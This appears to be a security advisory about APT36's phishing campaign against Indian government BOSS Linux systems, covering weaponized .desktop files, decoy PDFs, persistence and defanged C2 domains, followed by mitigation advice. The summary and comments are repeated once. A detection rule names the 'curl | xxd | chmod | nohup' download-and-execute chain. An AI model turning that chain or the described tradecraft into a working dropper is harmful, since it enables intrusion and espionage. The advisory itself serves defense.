Transparent Tribe Targets Indian Govt With Weaponized Desktop Shortcuts via Phishing
Summary:
An ongoing cyber-espionage campaign has been attributed to the Pakistan-based threat group APT36 (Transparent Tribe), after being observed actively targeting Indian government entities. The group is using sophisticated and flexible tactics, including spear-phishing emails containing malicious .desktop shortcut files for initial access. These files are designed to target Linux BOSS operating systems, establishing the group's capabilities to flexibly exploit environments. The malicious .desktop file is disguised as a legitimate PDF document. When opened, it executes a series of hidden commands that download a hex-encoded file from a malicious domain and convert it into a malicious binary. To remain surreptitious, the file then launches a decoy PDF in a web browser, making the victim believe they have only opened a document. The malware achieves persistence by using systemd and cron jobs, ensuring it automatically restarts after reboots or process terminations. The campaign uses two main malicious domains, securestore[.]cv and modgovindia[.]space, which are newly registered and serve as C2 servers for downloading payloads and exfiltrating data. The malware uses low-level socket operations and DNS queries for C2 communication, indicating a sophisticated C2 channel. This campaign underscores APT36's state-sponsored motivation to direct their focus on the Indian government, military, and diplomatic institutions. The group's proven ability to diversify its attack vectors to include Linux-based platforms demonstrates the adaptability of its increasingly sophisticated operations. Although Indian government entities remain the primary focus, APT36 has extended operations to adjacent sectors (education, research, and civil society), as well as conducted opportunistic targeting in other geographies, introducing a risk to partners and suppliers abroad.
Security Officer Comments:
This operation highlights a shift in APT36's methodology, moving beyond its historical focus on Windows to additionally exploit Linux BOSS, a system likely used within Indian government entities. This diversification of their targeted systems makes the group more resilient, as it can tailor its attacks to the victim's specific operating environment. The use of social engineering, combined with the technical prowess illustrated by the .desktop file payload, which silently executes malicious code and establishes persistence, demonstrates a high level of operational tradecraft. The rapid registration of disposable infrastructure, such as the securestore[.]cv and modgovindia[.]space domains, also reflects an efficient and well-resourced threat actor. This campaign signals that nation-state groups, especially those in a state of heightened geopolitical tension, are actively broadening their attack surface to include indigenous operating systems, posing a new security gap for these hypertargeted operations. Organizations, especially those in government and critical infrastructure, should adjust their security posture accordingly to accommodate similar threats. Additionally, CloudSEK independently reported on this activity, highlighting the anti-debugging and anti-sandbox capabilities of the malware. Another report from Hunt[.]io at the end of July reports on similar activity and notes the use of Poseidon backdoor malware.
Suggested Corrections:
IOCs are available here.
To mitigate the ongoing APT36 campaign targeting Indian Government entities through weaponized .desktop files and associated malicious domains, the following measures are formally recommended:
https://thehackernews.com/2025/08/transparent-tribe-targets-indian-govt.html
https://www.cyfirma.com/research/apt36-targets-indian-boss-linux-systems-with-weaponized-autostart-files/
An ongoing cyber-espionage campaign has been attributed to the Pakistan-based threat group APT36 (Transparent Tribe), after being observed actively targeting Indian government entities. The group is using sophisticated and flexible tactics, including spear-phishing emails containing malicious .desktop shortcut files for initial access. These files are designed to target Linux BOSS operating systems, establishing the group's capabilities to flexibly exploit environments. The malicious .desktop file is disguised as a legitimate PDF document. When opened, it executes a series of hidden commands that download a hex-encoded file from a malicious domain and convert it into a malicious binary. To remain surreptitious, the file then launches a decoy PDF in a web browser, making the victim believe they have only opened a document. The malware achieves persistence by using systemd and cron jobs, ensuring it automatically restarts after reboots or process terminations. The campaign uses two main malicious domains, securestore[.]cv and modgovindia[.]space, which are newly registered and serve as C2 servers for downloading payloads and exfiltrating data. The malware uses low-level socket operations and DNS queries for C2 communication, indicating a sophisticated C2 channel. This campaign underscores APT36's state-sponsored motivation to direct their focus on the Indian government, military, and diplomatic institutions. The group's proven ability to diversify its attack vectors to include Linux-based platforms demonstrates the adaptability of its increasingly sophisticated operations. Although Indian government entities remain the primary focus, APT36 has extended operations to adjacent sectors (education, research, and civil society), as well as conducted opportunistic targeting in other geographies, introducing a risk to partners and suppliers abroad.
Security Officer Comments:
This operation highlights a shift in APT36's methodology, moving beyond its historical focus on Windows to additionally exploit Linux BOSS, a system likely used within Indian government entities. This diversification of their targeted systems makes the group more resilient, as it can tailor its attacks to the victim's specific operating environment. The use of social engineering, combined with the technical prowess illustrated by the .desktop file payload, which silently executes malicious code and establishes persistence, demonstrates a high level of operational tradecraft. The rapid registration of disposable infrastructure, such as the securestore[.]cv and modgovindia[.]space domains, also reflects an efficient and well-resourced threat actor. This campaign signals that nation-state groups, especially those in a state of heightened geopolitical tension, are actively broadening their attack surface to include indigenous operating systems, posing a new security gap for these hypertargeted operations. Organizations, especially those in government and critical infrastructure, should adjust their security posture accordingly to accommodate similar threats. Additionally, CloudSEK independently reported on this activity, highlighting the anti-debugging and anti-sandbox capabilities of the malware. Another report from Hunt[.]io at the end of July reports on similar activity and notes the use of Poseidon backdoor malware.
Suggested Corrections:
IOCs are available here.
To mitigate the ongoing APT36 campaign targeting Indian Government entities through weaponized .desktop files and associated malicious domains, the following measures are formally recommended:
- Email Security Enhancements
- Deploy advanced email security solutions capable of detecting spear-phishing emails that contain .desktop, .sh, .elf, and compressed archive attachments.
- Disable automatic execution of email attachments and apply sandbox-based detonation of suspicious files prior to delivery.
- Enable URL filtering to block connections to newly registered or malicious domains (e.g., securestore[.]cv, modgovindia[.]space).
- User Awareness and Training
- Conduct regular cybersecurity awareness training, with emphasis on phishing indicators and high-risk Linux-specific file types.
- Promote caution when handling unsolicited attachments, particularly .desktop files disguised as official documents, or unknown Google Drive links.
- Host and Operating System Hardening
- Restrict execution of files from world-writable directories, such as /tmp, using filesystem mount options (noexec, nodev).
- Disable execution of .desktop files from untrusted sources and enforce strict application authorization controls.
- Apply least privilege principles in BOSS Linux deployments, with stringent controls over the use of utilities, such as curl, xxd, chmod, and nohup.
- Endpoint and Network Monitoring
- Implement Linux-capable Endpoint Detection and Response (EDR) solutions to monitor for execution of unknown ELF payloads, lateral movement, and C2 beaconing activity.
- Monitor DNS and outbound traffic for attempted connections to suspicious or recently registered APT36-associated domains.
- Use network segmentation to contain any potential compromise and limit lateral movement within critical infrastructure.
- Threat Intelligence Integration
- Integrate CYFIRMA-provided Indicators of Compromise (IOCs) and YARA signatures into SIEM and IDS/IPS platforms to facilitate early detection.
- Conduct initiative-taking threat hunting based on known APT36 tactics, techniques, and procedures (TTPs) mapped to MITRE ATT&CK (e.g., T1204, T1059, T1105).
- Patch and Vulnerability Management
- Ensure BOSS Linux systems and commonly leveraged software (e.g., curl, LibreOffice) are patched promptly to mitigate exploitation of known vulnerabilities.
- Behavior-Based Controls
- Deploy detection rules to identify suspicious command sequences (e.g., curl | xxd | chmod | nohup) executed through .desktop files or shell scripts.
- Block execution of binaries downloaded via scripts unless verified and digitally signed by the organization.
https://thehackernews.com/2025/08/transparent-tribe-targets-indian-govt.html
https://www.cyfirma.com/research/apt36-targets-indian-boss-linux-systems-with-weaponized-autostart-files/